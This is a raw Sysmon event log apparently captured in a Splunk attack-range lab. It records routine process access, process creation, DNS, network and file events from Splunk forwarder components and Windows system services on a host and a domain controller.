10:33:45.633{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213661Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.633{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213660Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.633{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213659Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.633{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0D89-6216-E103-000000003902}1936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213658Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.633{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0D89-6216-E103-000000003902}1936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213657Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.635{4F8D34B0-0D89-6216-E103-000000003902}1936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000213656Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.618{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213655Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.133{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0D89-6216-E003-000000003902}2404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213654Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.133{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213653Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.133{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213652Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.133{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213651Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.133{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213650Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.133{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213649Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.133{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213648Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.133{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213647Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.133{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213646Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.133{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213645Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.133{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0D89-6216-E003-000000003902}2404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213644Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.133{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0D89-6216-E003-000000003902}2404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213643Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.134{4F8D34B0-0D89-6216-E003-000000003902}2404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000284558Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:44.834{C8EA50B7-0169-6216-B402-000000003802}4248C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53188-false34.120.208.123123.208.120.34.bc.googleusercontent.com443https 354300x8000000000000000284557Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:44.833{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local51634- 354300x8000000000000000284556Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:44.831{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse127.0.0.1-65535-false127.0.0.1-53domain 354300x8000000000000000284555Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:44.812{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-65535- 354300x8000000000000000284554Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:44.812{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue7f00:1:0:0:98f0:e32b:fbf:ffff-65535-true7f00:1:0:0:0:0:0:0-53domain 23542300x8000000000000000284553Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:46.150{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=720756537901EC92A3B48144191076B5,SHA256=4EC2D0AFE97362B4DBC87A8AFAD1DBCAF12581C40587CB2528505DEE695CCDBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213673Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:46.274{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C71EBD123762779D8028010D4D1311CA,SHA256=F2CF8205D19F4AAC870A79BEAFA499ECB32110035761E627091579437CB3F843,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213672Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:46.274{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCC20C3199EB9768BBCB399921A5B41A,SHA256=41EBC140EF14EEDB4F97FBA93F3D91767EC0D4955AFED52B5EDC21B5915AB1BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213671Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:46.274{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=65CB46174FDF03152BEF90D67867C3D6,SHA256=DCE20E5C93DBCD2F26EDDF56AA1B80BAB046B9FD6956F4B07A0E29B7093FF488,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284552Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:46.118{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213670Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.993{4F8D34B0-0D89-6216-E103-000000003902}19362452C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213701Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.915{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0D8B-6216-E303-000000003902}1172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213700Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 